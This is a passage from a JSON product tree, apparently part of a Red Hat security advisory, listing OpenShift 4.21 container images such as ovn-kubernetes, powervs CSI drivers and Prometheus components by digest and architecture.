"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:3204209247dc1156aeb75d1c39318ec9134b83a54971069948dddef1d6b6cd12_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:3c3b9853705634c467564bc083186c2ab5e12602b3120afd6f0f2e443a4f66e7_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:3c3b9853705634c467564bc083186c2ab5e12602b3120afd6f0f2e443a4f66e7_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:3c3b9853705634c467564bc083186c2ab5e12602b3120afd6f0f2e443a4f66e7_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:978dafa970007d31c2852bfb77988c32682286d57661009997b119887e48bec7_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:978dafa970007d31c2852bfb77988c32682286d57661009997b119887e48bec7_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:978dafa970007d31c2852bfb77988c32682286d57661009997b119887e48bec7_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:3cf987d5f69ec722a2b608f18a58526e86a063c29c222afd7ef574e64452bbc1_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:3cf987d5f69ec722a2b608f18a58526e86a063c29c222afd7ef574e64452bbc1_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:3cf987d5f69ec722a2b608f18a58526e86a063c29c222afd7ef574e64452bbc1_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:53f90f1a9d059664796d663821bccf37f895c9562a6d31674b7eaab675238135_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:53f90f1a9d059664796d663821bccf37f895c9562a6d31674b7eaab675238135_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:53f90f1a9d059664796d663821bccf37f895c9562a6d31674b7eaab675238135_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:7d0a851c8b32356a0d3c02e28ca29ddb899f41f1d0ad6abf03671b4dccea0de0_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:7d0a851c8b32356a0d3c02e28ca29ddb899f41f1d0ad6abf03671b4dccea0de0_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:7d0a851c8b32356a0d3c02e28ca29ddb899f41f1d0ad6abf03671b4dccea0de0_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:dcc0c3762f4c80e5ae273da4e1fff620cc12d064d64489bac41ff83d8c88141c_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:dcc0c3762f4c80e5ae273da4e1fff620cc12d064d64489bac41ff83d8c88141c_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:dcc0c3762f4c80e5ae273da4e1fff620cc12d064d64489bac41ff83d8c88141c_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:18249c2a449d27f9c9d2d2914669bef0221e9d779630da939c8e45562e8eab55_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:18249c2a449d27f9c9d2d2914669bef0221e9d779630da939c8e45562e8eab55_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:18249c2a449d27f9c9d2d2914669bef0221e9d779630da939c8e45562e8eab55_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:251e0b536826e5353396f8069d508ef5f9cba6c38bc66be2aee9037759228834_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:251e0b536826e5353396f8069d508ef5f9cba6c38bc66be2aee9037759228834_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:251e0b536826e5353396f8069d508ef5f9cba6c38bc66be2aee9037759228834_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:848bdd1bed4275a4ea071b7351cafaed425fab7e82e3b71fb6d31b4a9a61d47a_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:848bdd1bed4275a4ea071b7351cafaed425fab7e82e3b71fb6d31b4a9a61d47a_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:848bdd1bed4275a4ea071b7351cafaed425fab7e82e3b71fb6d31b4a9a61d47a_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:b345413f9a1f1fef3738703c71bcb421b4eb795510637e8c5e8f6a20662035ad_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:b345413f9a1f1fef3738703c71bcb421b4eb795510637e8c5e8f6a20662035ad_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:b345413f9a1f1fef3738703c71bcb421b4eb795510637e8c5e8f6a20662035ad_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:1eb19e964813016a8287d03fbf76f10253b9403458297aac393cff083964bc86_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:1eb19e964813016a8287d03fbf76f10253b9403458297aac393cff083964bc86_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:1eb19e964813016a8287d03fbf76f10253b9403458297aac393cff083964bc86_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:844c042e56ff995d0fbcb560ca0bef9fe4799f7d4d36932034ea37fbc297c5cc_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:844c042e56ff995d0fbcb560ca0bef9fe4799f7d4d36932034ea37fbc297c5cc_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:844c042e56ff995d0fbcb560ca0bef9fe4799f7d4d36932034ea37fbc297c5cc_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:131459dfd1f4c159d75385b96fd46f8eb9aa260fd2b380406db49325bc858d6d_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:131459dfd1f4c159d75385b96fd46f8eb9aa260fd2b380406db49325bc858d6d_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:131459dfd1f4c159d75385b96fd46f8eb9aa260fd2b380406db49325bc858d6d_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:8933b234c6bd8186738f18d257dfc32d35641538925b52afd1a0a13d65e22fc8_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:8933b234c6bd8186738f18d257dfc32d35641538925b52afd1a0a13d65e22fc8_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:8933b234c6bd8186738f18d257dfc32d35641538925b52afd1a0a13d65e22fc8_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:04aaf3453b00bad5f560a3529744451850a7495a5b1c09d22602c4668d59334e_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:04aaf3453b00bad5f560a3529744451850a7495a5b1c09d22602c4668d59334e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:04aaf3453b00bad5f560a3529744451850a7495a5b1c09d22602c4668d59334e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:4886d171f5973bfd35c0291181485bba6aa524eb8fc16d50a0fe58cf802e35f1_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:4886d171f5973bfd35c0291181485bba6aa524eb8fc16d50a0fe58cf802e35f1_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:4886d171f5973bfd35c0291181485bba6aa524eb8fc16d50a0fe58cf802e35f1_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:12c93d59cee5e4b1e078728dcfff46a32d74022cadee43e8ba7ea6eec7c1550b_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:12c93d59cee5e4b1e078728dcfff46a32d74022cadee43e8ba7ea6eec7c1550b_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:12c93d59cee5e4b1e078728dcfff46a32d74022cadee43e8ba7ea6eec7c1550b_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:13755e7b9d537d64ea31a50af4c425415aac6b2e73a6624c291b09cc10ccdc84_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:13755e7b9d537d64ea31a50af4c425415aac6b2e73a6624c291b09cc10ccdc84_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:13755e7b9d537d64ea31a50af4c425415aac6b2e73a6624c291b09cc10ccdc84_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2851992f2dc7ddfa802ec2902a59e3cb6c19f23b8810e770e82b487748610e64_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2851992f2dc7ddfa802ec2902a59e3cb6c19f23b8810e770e82b487748610e64_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2851992f2dc7ddfa802ec2902a59e3cb6c19f23b8810e770e82b487748610e64_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:61597437e96e4fe017f1156d30528ea4d14246b0d8e7b68c205c56f7a151283f_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:61597437e96e4fe017f1156d30528ea4d14246b0d8e7b68c205c56f7a151283f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:61597437e96e4fe017f1156d30528ea4d14246b0d8e7b68c205c56f7a151283f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:b679772c7eb5295743d31ff4df6f1419084c02990679b86009c4708589fe6403_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:b679772c7eb5295743d31ff4df6f1419084c02990679b86009c4708589fe6403_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:b679772c7eb5295743d31ff4df6f1419084c02990679b86009c4708589fe6403_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:c16b49f06ab83306a1859620bc6b9721b8cd6af4a55248f55aad32da14b3b7c8_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:c16b49f06ab83306a1859620bc6b9721b8cd6af4a55248f55aad32da14b3b7c8_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:c16b49f06ab83306a1859620bc6b9721b8cd6af4a55248f55aad32da14b3b7c8_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:1304433ac42f7966801fc7adb9bab2cb85db100c27299f0817a60436a57118c5_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:1304433ac42f7966801fc7adb9bab2cb85db100c27299f0817a60436a57118c5_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:1304433ac42f7966801fc7adb9bab2cb85db100c27299f0817a60436a57118c5_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:4622e61163cba7f1fa87feddf2832e0c8cb4dae6fb70f41b6e03b39cb93770ff_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:4622e61163cba7f1fa87feddf2832e0c8cb4dae6fb70f41b6e03b39cb93770ff_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:4622e61163cba7f1fa87feddf2832e0c8cb4dae6fb70f41b6e03b39cb93770ff_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:9e390a25735b44286e3649b4872910720050d0f710feb67f914621db1913ce8e_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:9e390a25735b44286e3649b4872910720050d0f710feb67f914621db1913ce8e_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:9e390a25735b44286e3649b4872910720050d0f710feb67f914621db1913ce8e_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:b51f2f5767746f45c1a3092fe327d65f162b999c0e674764d861f168301b71e6_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:b51f2f5767746f45c1a3092fe327d65f162b999c0e674764d861f168301b71e6_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:b51f2f5767746f45c1a3092fe327d65f162b999c0e674764d861f168301b71e6_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:0101d5fe5eb0f2c3144ba364412dcd21c0c7b08c0beacd3fc5dd564767b2d9e0_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:0101d5fe5eb0f2c3144ba364412dcd21c0c7b08c0beacd3fc5dd564767b2d9e0_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:0101d5fe5eb0f2c3144ba364412dcd21c0c7b08c0beacd3fc5dd564767b2d9e0_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:0bc5a5a619cb16e67f81551ea4b96af7a8db26addfb202d9ca5ceab4168f459f_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:0bc5a5a619cb16e67f81551ea4b96af7a8db26addfb202d9ca5ceab4168f459f_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:0bc5a5a619cb16e67f81551ea4b96af7a8db26addfb202d9ca5ceab4168f459f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5b379b10c95eb7a89203d552ee1c3437ce0afbe61fb0afbdff6f5f421962df5b_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5b379b10c95eb7a89203d552ee1c3437ce0afbe61fb0afbdff6f5f421962df5b_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5b379b10c95eb7a89203d552ee1c3437ce0afbe61fb0afbdff6f5f421962df5b_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:81cb7b7fa35e3474c1be5650beaf6f6e963ee2f739221d7226933e3aa6a3f226_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:81cb7b7fa35e3474c1be5650beaf6f6e963ee2f739221d7226933e3aa6a3f226_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:81cb7b7fa35e3474c1be5650beaf6f6e963ee2f739221d7226933e3aa6a3f226_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:313bd25c0339ea434c08a438eda7bd5e3323bf0e02934ee4d01eb31af658a07a_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:313bd25c0339ea434c08a438eda7bd5e3323bf0e02934ee4d01eb31af658a07a_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:313bd25c0339ea434c08a438eda7bd5e3323bf0e02934ee4d01eb31af658a07a_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:38ee956747c9e76adb8038bc81918a6fb8a800313a93cff8822d309466754b67_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:38ee956747c9e76adb8038bc81918a6fb8a800313a93cff8822d309466754b67_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:38ee956747c9e76adb8038bc81918a6fb8a800313a93cff8822d309466754b67_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:3d3258d77f4829041e29a9dea806a0041237646e65ad3c3007d7cd98ec15bfdc_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:3d3258d77f4829041e29a9dea806a0041237646e65ad3c3007d7cd98ec15bfdc_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:3d3258d77f4829041e29a9dea806a0041237646e65ad3c3007d7cd98ec15bfdc_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:da587c47cc75ef54935b580d8e40852523c707e52954bcccf0def9da3de88063_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:da587c47cc75ef54935b580d8e40852523c707e52954bcccf0def9da3de88063_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:da587c47cc75ef54935b580d8e40852523c707e52954bcccf0def9da3de88063_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:1a3732c862f54453a192ebf7727b2f0339909e2207b3ae809ffa321f14d1cc17_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:1a3732c862f54453a192ebf7727b2f0339909e2207b3ae809ffa321f14d1cc17_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:1a3732c862f54453a192ebf7727b2f0339909e2207b3ae809ffa321f14d1cc17_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:270d198ff926a597b38e25e78868bce6ffd76c9601ba71e56d6312f5a35e3d37_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:270d198ff926a597b38e25e78868bce6ffd76c9601ba71e56d6312f5a35e3d37_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:270d198ff926a597b38e25e78868bce6ffd76c9601ba71e56d6312f5a35e3d37_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:b45c8f4aa119aefaed6080c553d7414b4d25ddb0968147f1344c2a82671ad177_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:b45c8f4aa119aefaed6080c553d7414b4d25ddb0968147f1344c2a82671ad177_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:b45c8f4aa119aefaed6080c553d7414b4d25ddb0968147f1344c2a82671ad177_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:bcf37dd6a57b6d6ecbd834cf812adee2dc841b8bf1d08c21ea29a3c6aab4d405_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:bcf37dd6a57b6d6ecbd834cf812adee2dc841b8bf1d08c21ea29a3c6aab4d405_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:bcf37dd6a57b6d6ecbd834cf812adee2dc841b8bf1d08c21ea29a3c6aab4d405_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:5251c3ad369f33e07c6e24f482c562edce287bdae6b8e505ecb8d3cf09fc32be_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:5251c3ad369f33e07c6e24f482c562edce287bdae6b8e505ecb8d3cf09fc32be_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:5251c3ad369f33e07c6e24f482c562edce287bdae6b8e505ecb8d3cf09fc32be_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:7304e26ef6c8ab4d2c647cc2ba65af9a92fd0f1fead62da0c435d71b397aada8_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:7304e26ef6c8ab4d2c647cc2ba65af9a92fd0f1fead62da0c435d71b397aada8_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:7304e26ef6c8ab4d2c647cc2ba65af9a92fd0f1fead62da0c435d71b397aada8_s390x",
